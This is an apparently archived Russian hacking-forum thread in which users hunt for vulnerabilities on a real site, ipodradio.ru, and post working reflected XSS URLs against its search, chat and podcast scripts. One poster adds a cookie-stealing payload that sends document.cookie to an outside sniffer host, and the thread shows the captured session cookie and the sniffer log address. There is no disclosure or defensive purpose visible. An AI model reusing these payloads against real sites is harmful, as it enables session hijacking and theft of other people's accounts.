PDA

Просмотр полной версии : Chat на айпод.

combat7777
03.01.2007, 22:14
http://www.ipodradio.ru/cgi-bin/chat.cgi?room=227

проверим веб чат на дырки. флудилки достали, админ редко появляетя а модера ничего не могут сделать... :)
combat7777
04.01.2007, 21:04
Ну что никто не пробовал...придётся одному возиться...
Goudini
04.01.2007, 21:15
http://www.ipodradio.ru/cgi-bin/search.cgi?search=%22%3E%3Cscript%3Ealert(%22xss%2 2)%3C/script%3E

На те пассивную xss, радуйся =)
InferNo23
04.01.2007, 21:23
http://www.ipodradio.ru/cgi-bin/chat.cgi?room=%22%3E%3Cscript%3Ealert()%3C/script%3E
combat7777
05.01.2007, 02:12
Благодарствую тебя познающий !!!
combat7777
05.01.2007, 02:26
http://www.ipodradio.ru/cgi-bin/search.cgi?search=%22%3E%3Cscript%3Ealert(%22xss%2 2)%3C/script%3E

На те пассивную xss, радуйся =)


Эта пассивная на подкасты выводит... :cool:
JFKenedi
05.01.2007, 19:25
Вот еще одна...
_http://www.ipodradio.ru/cgi-bin/podcasts.cgi?t=%3Cfont%20color=red%3EPREVED</div><br><br><br><script>alert('hello world')</script>
JFKenedi
05.01.2007, 19:57
Вот Активная можно заснифать свои куки ! =)

Запрос с www.ipodradio.ru (05.01.2007 18:53)
IP: 217.149.16.77
QUERY: =b=b; cinfo=Has component: undefined; version: undefined; has ajax: yes; xsid=4d315f550695126b5bf2e204e7882474
REFERER: http://www.ipodradio.ru/cgi-bin/search.cgi?search="><script>img = new Image(); img.src = "http://antichat.org/s/JFKenedi.gif?="+document.cookie;</script><input type="hidden&sby=podcast&x=0&y=0
AGENT: Opera/8.01 (Windows NT 5.1; U; ru)
Kaban
05.01.2007, 20:10
Вот Активная можно заснифать свои куки ! =)

Запрос с www.ipodradio.ru (05.01.2007 18:53)
IP: 217.149.16.77
QUERY: =b=b; cinfo=Has component: undefined; version: undefined; has ajax: yes; xsid=4d315f550695126b5bf2e204e7882474
REFERER: http://www.ipodradio.ru/cgi-bin/search.cgi?search="><script>img = new Image(); img.src = "http://antichat.org/s/JFKenedi.gif?="+document.cookie;</script><input type="hidden&sby=podcast&x=0&y=0
AGENT: Opera/8.01 (Windows NT 5.1; U; ru)

это пасивка
DRON-ANARCHY
05.01.2007, 20:48
Вот Активнаямда...

причем
http://www.ipodradio.ru/cgi-bin/search.cgi?search=%22%3E%3Cscript%3Ealert(%22xss%2 2)%3C/script%3E
и
http://www.ipodradio.ru/cgi-bin/search.cgi?search="><script>img = new ** BLA-BLA-BLAэто одно и то же
combat7777
06.01.2007, 01:30
это пасивка
Не получилосс заснифать...
JFKenedi
06.01.2007, 07:05
Ну у меня куи на сниффер ушли...

=b=b;
cinfo=Has component:
undefined; version:
undefined; has ajax:
yes;
xsid=4d315f550695126b5bf2e204e7882474

Вот Адрес сниффера
http://antichat.org/s/JFKenedi/log.php